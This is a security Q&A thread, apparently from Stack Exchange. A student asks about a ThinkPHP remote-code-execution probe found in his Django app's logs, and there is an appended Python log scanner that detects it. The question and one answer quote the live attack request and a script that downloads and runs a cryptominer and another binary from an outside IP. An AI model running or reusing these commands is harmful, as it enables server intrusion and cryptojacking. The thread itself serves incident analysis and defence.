3

I developed a Django application for a school project and I hosted it on an EC2 instance to test and learn the environment.

During inspection of the logs, I found the following GET request,

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472

This seems strange because I don't use PHP. I guess that someone assumed I use PHP, then tried to download and run a script ex.sh from 205.185.113.123. The content of that script is:

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Since I don't know much about web apps and security, I have some questions:

  • Is this an attack? If so, what is the name of this attack?
  • Can this attack be adapted for Django instead of PHP?
  • Is this normal for web apps? Do they always get this kind of request?
  • According to https://ipinfo.info/, the IP address is registered for a company called FranTech Solutions. Are they related to this attack?
  • Is this illegal? If so, can I take legal action?
EdOverflow
Emre Sülün
  • 2
    Concerning the statement "`I guess that someone assumed I use PHP`", it is far more likely that this is an automated attack whereby an adversary is currently scanning entire ranges of hosts and IPs for this ThinkPHP remote code execution vulnerability. They wouldn't have even tried to guess whether or not your application is PHP-based — this is more of a "spray-and-pray" process. – EdOverflow Dec 25 '18 at 13:50

2 Answers

4
  • This is trying to exploit a remote code execution vulnerability in ThinkPHP. So yes, someone is attempting to attack.
  • Yes. Although this specific one is specific to ThinkPHP, there are also regularly vulnerabilities for Django.
  • Yes, this is very common for web apps. This is not the only type of request used to attack, and a successful attacker might change the log file so you don't notice there was an attack. In my opinion a publicly hosted web app which processes non-public information (this also includes usernames/passwords for login) should not be done for a school project, at least not without professional consulting, because of risks like stolen data. Even with only publicly available information it can cause damage, like computing costs when the attacker uses it as a crypto miner (as in your case) and manages to spin up more instances.
  • FranTech Solutions seems to rent out servers. So it might be FranTech Solutions, it might be a customer of FranTech Solutions or it might be someone hacked a customer of FranTech Solutions.
  • Whether it is illegal or not depends on the jurisdiction. But typically police will not be interested in attempts without significant damage. You might send a complaint to FranTech Solutions, and if they get enough complaints they might or might not shut down the server or customer, or they might or might not just inform the customer that the server might have been hacked, and the customer might or might not fix the server.

Typically webmasters will ignore such log entries after making sure they aren't vulnerable because it is so common, especially if the website has more than 100 users.

H. Idden
  • 1
    Just to add further details to your second point, the vulnerability type (i.e., remote code execution) can affect Django-based applications, but this specific exploit code is really designed for targets running ThinkPHP. I think this should be made explicitly clear to prevent potential confusion. – EdOverflow Dec 25 '18 at 13:43
  • @EdOverflow thanks for noticing it could be interpreted differently than I meant to – H. Idden Dec 25 '18 at 13:49
0

Yes, this exploit is basically a shell upload, in which the attacker uploads a file that directly interacts with your server to perform system commands remotely.

I already downloaded that file from your link; it looks like this:

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Basically that file downloads 2 more files, mcoin and sefa.x86; you need to look for those 2 files as well. Those two files are pre-compiled, so it is very hard to tell what they actually do to your server. But according to my study those files are crypto-currency miners.

https://www.webopedia.com/TERM/C/cryptomining-malware.html

Answers: 1) Is this an attack? If so, what is the name of this attack?

Yes, shell upload.

2) Can this attack be adapted for Django instead of PHP?

If you really want to know whether that attack was successfully executed, then you need to search your web server directory and find those file names: ex.sh, mcoin, sefa.x86

3) Is this normal for web apps? Do they always get that kind of request? No.

4) Is this illegal? If so, can I start a legal action?

Yes, this is illegal. Yeah, you can take legal action.

  • 3
    Why do you consider it not normal to get such requests? Even on small web apps with less than 10 users where I have access to the logs there are more than 100 such requests per hour (most of them on the IP instead of the hostname). – H. Idden Dec 25 '18 at 13:35
  • Yeah, but these kinds of things are not usually seen in the log file. Automated scanners and other types of attempts are what I usually see. @H.Idden – Zodiac070495 Dec 25 '18 at 14:54
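As an added example (not code from either answer), a small Python scanner that does what the first answer recommends, recognising the ThinkPHP invokefunction probe in access logs, and what the second answer recommends, listing the file names the payload would drop so you can confirm they are absent. The log lines are constructed: the request string is the one quoted in the question, while the client IPs and timestamps are made up.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed combined-format access log lines: the first request is the ThinkPHP
# probe quoted in the question, the second a benign Django request; client IPs and
# timestamps are made up (203.0.113.0/24 is a documentation range).
LOG_LINES = [
    '203.0.113.5 - - [25/Dec/2018:13:00:01 +0000] "GET /index.php?s=/index/\\think\\app/invokefunction'
    '&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;'
    'chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472',
    '203.0.113.9 - - [25/Dec/2018:13:00:07 +0000] "GET /polls/ HTTP/1.1" 200 1532',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# ThinkPHP 5.x RCE probes route the request to the invokefunction method via "s"
THINKPHP_RE = re.compile(r"[\\/]think[\\/]app[\\/]invokefunction", re.IGNORECASE)

def parse_query(query):
    """Split on '&' only (';' is part of the payload here) and percent-decode."""
    pairs = []
    for chunk in query.split("&"):
        key, _, value = chunk.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs

def analyse_target(target):
    """Return probe details if the request target matches the ThinkPHP pattern, else None."""
    query = urlsplit(target).query
    if not THINKPHP_RE.search(unquote(query)):
        return None
    params = parse_query(query)
    # vars[0] is the PHP function handed to call_user_func_array, vars[1][] its argument
    var_values = [v for k, v in params if k.startswith("vars")]
    command = var_values[1] if len(var_values) > 1 else ""
    urls = re.findall(r"https?://[^\s;|&]+", command)
    return {
        "function": dict(params).get("function"),
        "command": command,
        "download_urls": urls,
        # names the payload would drop into /tmp; their absence is the quick check
        # that the probe did nothing on a non-PHP host
        "dropped_files": [u.rsplit("/", 1)[-1] for u in urls],
    }

def scan(lines):
    """Return one finding per log line carrying a ThinkPHP invokefunction probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (details := analyse_target(m.group(3))):
            # a 200 from a Django app only means the framework answered, not that the payload ran
            findings.append({"ip": m.group(1), "status": int(m.group(4)), **details})
    return findings
```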